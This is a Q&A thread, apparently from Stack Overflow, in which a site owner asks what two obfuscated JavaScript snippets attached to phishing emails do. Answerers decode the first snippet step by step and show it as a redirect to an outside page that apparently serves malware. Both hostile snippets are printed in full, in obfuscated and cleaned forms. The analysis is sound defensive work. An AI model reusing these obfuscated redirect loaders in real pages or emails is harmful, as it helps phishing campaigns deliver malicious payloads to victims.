What does this javascript do?

Question

What does this javascript do?

I just found out that a spammer sends email from our domain name, pretending to be us, saying:

Dear Customer,
This email was sent to ourwebsite.com to notify you that we are temporarily preventing access to your account.
We have reason to believe that your account may have been someone else. Run the attached file and follow the instructions.
(C) ourwebsite.com (I changed this)

The attached file is an HTML file that has the following javascript:

<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";bi();this.xT='';</script>

In another letter was:

 <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Can anyone tell me what he is doing? Thus, we can see if we have a vulnerability, and if we need to tell our customers about it ...

thanks

+4

javascript phishing

Nathan h Jun 11 '10 at 1:17

source share

4 answers

There are no geniuses, they are:

 hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''); http : / / mvblaw . com / z . htm f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')]; location iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a; href

No need to even run it through regex :)

I'm going to suggest that they hacked mvblaw and pulled the payload page there. Does anyone with a VM want to see what he is doing?

+3

egrunin Jun 11 '10 at 1:24

source share

The script contains many useless things to create confusion, the main parts of the script are:

 function mD() {}; mD.prototype = { i: function () { // read between every two letters: var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg' .replace(/[gJG,\<]/g, ''); var f = document; var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')]; iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a; } }; var b = new mD(); bi();

If we clear more:

 function mD() {}; mD.prototype = { i: function () { var a = 'http://mvblaw.com/z.htm'; var f = document; var iD = f['location']; iD['href'] = a; } }; var b = new mD(); bi();

And further:

 function mD() {}; mD.prototype = { i: function () { document.location.href = 'http://mvblaw.com/z.htm'; } }; var b = new mD(); bi();

+3

CMS Jun 11 '10 at 1:31

source share

Basically, it seems that setting (document['location'])['href'] (or, in the usual way, document.location.href ) at http://mvblaw.com/z.htm .

The obfuscation code is pretty simple, just replacing nothing with noise characters:

 var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''); // a = http://mvblaw.com/z.htm var f=document; var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')]; // iD = document.location iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a; // document.location.href = a (the URL above).

0

paxdiablo Jun 11 '10 at 1:28

source share

SLaks · Accepted Answer · 2010-06-11T01:22:05+0000

Answer:

Script is running

 document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume)

It also contains a large number of useless lines to hide the purpose of the script.

Analysis

Here it is unpacked.

 function mD() {}; this.aB = 43719; mD.prototype = { i: function () { var w = new Date(); this.j = ''; var x = function () {}; var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''); var d = new Date(); y = ""; aL = ""; var f = document; var s = function () {}; this.yE = ""; aN = ""; var dL = ''; var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')]; this.v = "v"; var q = 27427; var m = new Date(); iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a; dE = ''; k = ""; var qY = function () {}; } }; xO = false; var b = new mD(); yY = ""; bi(); this.xT = '';

Cleaning obfuscation and adding meaningful names, it becomes

 function TempClass() {}; this.aB = 43719; TempClass.prototype = { doIt: function () { var w = new Date(); this.j = ''; var x = function () {}; var a = "http://mvblaw.com/z.htm"; //Evil site (I assume) var d = new Date(); y = ""; aL = ""; var f = document; var s = function () {}; this.yE = ""; aN = ""; var dL = ''; var iD = f['location']; this.v = "v"; var q = 27427; var m = new Date(); iD['href'] = a; dE = ''; k = ""; var qY = function () {}; } }; xO = false; var b = new TempClass(); yY = ""; b.doIt(); this.xT = '';

Removing all useless lines, it becomes

 function TempClass() {}; TempClass.prototype = { doIt: function () { var a = "http://mvblaw.com/z.htm"; //Evil site (I assume) var f = document; var iD = f['location']; iD['href'] = a; } }; var b = new TempClass(); b.doIt();

What does this javascript do?

Answer:

Analysis

More articles: